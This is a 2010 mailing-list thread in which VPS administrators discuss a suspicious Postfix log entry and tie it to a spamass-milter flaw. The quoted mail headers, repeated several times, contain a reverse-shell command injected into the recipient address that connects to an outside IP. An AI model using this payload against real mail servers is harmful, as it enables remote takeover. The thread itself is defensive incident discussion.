18 Mar
2010
18 Mar
'10
7:47 a.m.
Hello Folks,
With all the talk about SSH security, it is also shocking to see the
break-in attempts made on other services e.g. httpd and smtpd.
The httpd are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
here), but an odd record in the Postfix log today was a little
different :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"(a)calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue(a)dick.com
To: undisclosed-recipients:;
I assume some sort of attempt to break Postfix. This message was
delivered to "root" mailbox (no content).
Scary place the internet sometimes ....
Cheers,
--
Alastair Sherringham
18 Mar
18 Mar
11:31 a.m.
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
[..]
Delivered-To: "root+:|exec /bin/sh
0</dev/tcp/92.243.5.144/9991 1>&0
That would be someone trying to exploit this absolute failure:
http://seclists.org/fulldisclosure/2010/Mar/140
David
1:53 p.m.
Hi,
On Thu, Mar 18, 2010 at 11:31:55AM +0000, David Leadbeater wrote:
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair
Sherringham wrote:
[..]
omg, everything old is new again. :(
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Delivered-To: "root+:|exec /bin/sh
0</dev/tcp/92.243.5.144/9991 1>&0
That would be someone trying to exploit this absolute failure:
http://seclists.org/fulldisclosure/2010/Mar/140
4:47 p.m.
On 18 March 2010 11:31, David Leadbeater <dgl(a)dgl.cx> wrote:
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair
Sherringham wrote:
[..]
Hmm. Thanks for that.
Luckily, I don't use spamass-milter but from I see, this vulnerability
is present in the current Debian code. I have not checked the source
though, just changelog (last entry last year). Scary stuff ...
--
Alastair Sherringham
Delivered-To: "root+:|exec /bin/sh
0</dev/tcp/92.243.5.144/9991 1>&0
That would be someone trying to exploit this absolute failure:
http://seclists.org/fulldisclosure/2010/Mar/140
1:49 p.m.
Hello,
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
With all the talk about SSH security, it is also
shocking to see the
break-in attempts made on other services e.g. httpd and smtpd.
The next most common set of compromises I see amongst BitFolk's
customers are incorrect configurations of Apache and/or Squid as
wide open proxies, which are found by routine scanning and then used
to do blog comment spam.
HTTP probes for URLs of applications that have had bugs, e.g.
Wordpress, Gallery, PhpMyAdmin followed by an attempt to exploit
those bugs are regularly seen by me although I can't recall having
seen a customer's VPS been made to do anything nasty by one of these
routes. It's probably happened, though.
an odd record in the Postfix log today was a little
different :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"(a)calliope.bitfolk
How odd. I assume it's trying to exploit some sort of sendmail bug
which must be very old, but then also uses bash's /dev/tcp support
which I thought was quite recent. Not seen one like that before!
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
19 Mar
19 Mar
9:45 a.m.
Hi Alastair,
I received the very same e-mail, only a matter of minutes after yours. My
server is not listed as an MX for any domains hence it looks like the
exploit attempts were a follow-up to a sweeping port scan. No doubt other
Bitfolk VPS's received the same thing.
Mathew
On Thu, March 18, 2010 7:47 am, Alastair Sherringham wrote:
The httpd are often mod_proxy or PHP/phpMyAdmin
attempts (no PHP
here), but an odd record in the Postfix log today was a little
different :
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"(a)calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue(a)dick.com
To: undisclosed-recipients:;
I assume some sort of attempt to break Postfix. This message was
delivered to "root" mailbox (no content).
Alastair Sherringham
5391
days inactive
5392
days old
5 comments
4 participants
participants (4)
-
Alastair Sherringham -
Andy Smith -
David Leadbeater -
Mathew Newton